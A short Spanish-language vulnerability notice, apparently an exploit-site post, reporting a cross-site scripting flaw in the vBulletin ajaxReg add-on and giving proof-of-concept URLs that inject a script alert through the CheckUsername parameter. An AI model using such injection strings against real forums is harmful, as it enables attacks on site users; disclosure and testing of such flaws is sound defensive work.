"se requiere ajaxReg para explotar la vulnerabilidad"
El error esta en ajaxReg (http://www.vbulletin.org/forum/showthread.php?t=144869) sirve para comprobar los datos cuando se esta escribiendo ..
POC:
http://[website]/[forumpath]/ajax.php?do=CheckUsername¶m=XSS
http://www.site.com/foro/ajax.php?do=CheckUsername¶m=<script>alert('xss');</script>
http://www.foro-cualquiera.com/ajax.php?do=CheckUsername¶m=<script>alert('xss');</script>
publicado en: http://mentespiritual.com/xss.txt